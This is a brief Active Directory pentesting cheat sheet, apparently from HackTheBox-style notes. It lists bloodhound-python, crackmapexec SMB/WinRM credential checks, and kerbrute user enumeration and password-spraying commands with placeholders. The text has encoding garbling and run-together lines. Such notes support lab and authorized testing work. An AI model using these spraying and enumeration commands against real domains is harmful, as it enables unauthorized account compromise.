Enumeration
>>>bloodhound-pyhton -u username -p password -d htb.local -ns $IP
Grabbing Host-name
crackmapexec smb $IPYou found Users but want to confirm đ
Page Link : https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
./kerbrute _linux_amd64 userenum --dc $IP -d <domain> users.txt
you have a password but don't know of which user đ
./kerbrute _linux_amd64 passwordspray --dc $IP -d <domain> users.txt âIampassword?âtest If your founded User can be accessed
crackmapexec smb $IP -u username -p âpasswordâ
crackmapexec winrm $IP -u username -p âpasswordâ
crackmapexec winrm $IP -d domain -u username -p âpasswordâ
Bloodhound
Last updated